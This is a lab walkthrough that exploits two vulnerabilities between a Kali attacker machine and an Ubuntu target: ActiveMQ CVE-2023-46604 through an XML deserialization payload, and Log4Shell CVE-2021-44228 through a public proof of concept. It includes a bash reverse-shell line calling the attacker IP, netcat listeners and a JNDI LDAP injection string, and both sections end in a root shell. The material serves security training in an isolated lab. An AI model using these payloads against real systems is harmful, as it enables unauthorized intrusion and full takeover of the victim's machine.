This lab guides on exploiting vulnerabilities of CVE-2023-46604
This lab requires the installation of 2 virtual machines. One Kali Linux machine version 2023.4 and one Ubuntu machine version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
On Kali Linux machine:
Install git
$sudo apt install git
Install gedit
$sudo apt install gedit
On Ubuntu machine:
Install git
$sudo apt install git
Install openjdk 18
$sudo apt install openjdk-18-jdk
Install ActiveMQ 5.18.2 package
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
On Ubuntu machine Open a terminal window and run the command as below:
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
Check the status of the service:
$./activemq status
If the service starts successfully, it will display on the terminal screen as "ActiveMQ Brocker is running".
You can also visit http://127.0.0.1:8161 to open ActiveMQ broker manager.It includes the hostname, version, ID, up time and some other information.
On Kali Linux machine
Download resources for the exploiting process:
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
As you can see, we have 2 files exploit.py and poc.xml:
- The poc.xml file contains a piece of malicious code that takes advantage of a vulnerability in the OpenWire protocol.
- The exploit.py file is responsible for HTTP encrypting and sending the poc.xml file to Brocker on the target machine. Open a web server at the resource path:
$cd CVE-2023-46604
$python3 -m http.server
Open a new terminal window to send the poc.xml file to the target's server via the exploit.py file:
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
After the command is executed, the Calculator application is launched on the target machine. This proves that the vulnerability has been successfully exploited. We continue to create a reverse shell to control the target machine.
Open a new terminal window to listen for reverse shell connections:
$sudo su
$nc -nlvp 4444
Return to the previous terminal and edit the poc.xml file:
$gedit poc.xml
Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file.
Sending malicious code again:
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
The result of this command is that we have obtained the root shell on the target machine. ROOTED!!!
This lab requires the installation of 2 virtual machines. Kali Linux machine version 2023.4 and Ubuntu machine version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
On Kali Linux machine:
Install git
$sudo apt install git
Install gedit
$sudo apt install gedit
On Ubuntu machine:
Install git
$sudo apt install git
Install docker
$sudo apt install docker.io
On Ubuntu machine
Step 1: Download openjdk
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz
Step 2: Download and build docker file
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
$docker build -t cve44228
$docker run --network host cve44228
After completing the above commands, we have a website. To browse the web, you can use the URL: http://<ubuntu_ip>:8080. In this tutorial, the address will look like: http://192.168.132.135:8080
On the Kali Linux machine, download the necessary resources to exploit the vulnerability
Download poc
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt
Download openjdk
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>
$tar -xf jdk-8u20-linux-x64.tar.gz //unzip the file
Open a new terminal to listen for reverse shell connections:
$sudo su
$nc -nlvp 9001
Launch LDAP and HTTP services with poc file
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080
The command will return results similar to the following
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}
[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389
Here, we are only interested in the generated jndi value. Open a web browser and enter the address of the website you created earlier. Login using jndi value. At this time, netcat terminal receives a connection. ROOTED!!!
For support, email dcm240602@gmail.com